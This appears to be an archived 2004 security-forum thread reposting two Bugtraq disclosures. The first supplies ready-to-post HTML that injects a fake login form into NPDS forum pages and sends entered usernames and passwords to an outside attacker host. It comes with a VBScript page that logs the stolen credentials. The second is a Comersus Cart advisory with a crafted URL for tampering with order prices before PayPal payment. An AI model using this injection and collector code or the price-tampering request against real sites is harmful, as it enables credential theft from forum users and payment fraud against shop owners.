Npds Bb Html Injection

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Jul 7 2004, 07:06 PM

QUOTE

I release it very quickly ... So it can be improved :

Code to put in a reply or in a topic :

Your fake message</td></tr><tr><td valign="bottom"><hr noshade size="1" class="ONGL"> &nbspProfil  www  Citation

  
</td></tr></table></TD></TR>

<div style="position: absolute; left=0; top=0; height=3200; width=150"><form action="http://mon-site-de-roxor.com/roxor.asp" method="post" name="piquage" target="_self"><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td colspan="2"><div align="center">Your session has expired. Please log in to reply.</div></td></tr><tr><td> </td></tr><tr><td><div align="right">Login :</div> </td> <td><input name="login" type="text" value=""> </td></tr><tr><td><div align="right">Mot de passe :</div> </td><td><input name="password" type="password" value=""> </td></tr><tr><td> </td></tr><tr><td colspan="2"><div align="center"><input type="submit" name="Submit" value="Envoyer"></div></td></tr></table></form></div>

Example of Code (VBscript) to put in the page called by the form in the topic :

<%@ Language=VBScript %>

<%

set base=server.createobject("ADODB.CONNECTION")

base.open nom_base, login_base, password_base

referant=left(request.servervariables("HTTP_REFERER"),instr(8,request.servervariables("HTTP_REFERER"),"/")-1)

login=Request.QueryString("login")

password=Request.QueryString("password")

requete_vol_infos="INSERT statistiques (date,npds,login,password) VALUES (getdate(),'" + cstr(referant) + "','" + cstr(login) + "','" + cstr(password) + "')"

set resultat_vol_infos=server.CreateObject("ADODB.RECORDSET")

resultat_vol_infos.Open requete_vol_infos, base

response.redirect(referant)

%>

Thanks to N-0-X and NewFFR :o)

Rituel

Source: http://seclists.org/lists/bugtraq/2004/Jul/0072.html

qcred11

Jul 7 2004, 07:07 PM

Here is another one:

QUOTE

Comersus Cart Improper Request Handling

Release Date:
July 6, 2004

Severity:
Medium

Vendor:
Comersus Open Technologies

Software:
Tested on Comersus Cart 5.09
Previous versions may also be affected.

Remote:
Remotely executed from any web browser

Technical Details:
The unethical user is able to modify the parameters to change the pricing
before the order is processed through PayPal. This would allow the
unethical user to place a fraudulent transaction which many times isn't
caught until the product is already shipped OR the shopping cart owner is
charged a chargeback fee when refunding the order.

Example:

http://[VICTIM]/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002&Order
Total=|102|222|228|22|130|36|209&name=Thomas&lastName=Ryan&address=123+Easy+
Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D
1731&email=tommy%40providesecurity%2Ecom&orderDetails=1x+%23RDHT%2F11+Red+Ha
t+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Mi
llennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BPRES2%2F6+So+You+Wan
t+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A

Vendor Fix:
Update to 5.098
http://www.comersus.com/
Use <form method="POST" on all Forms
Also recommend using SSL for ALL Transactional areas of the website.
Review all orders before processing

Credit:
Discovered By: Thomas Ryan
Provide Security

Source: http://seclists.org/lists/bugtraq/2004/Jul/0076.html

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.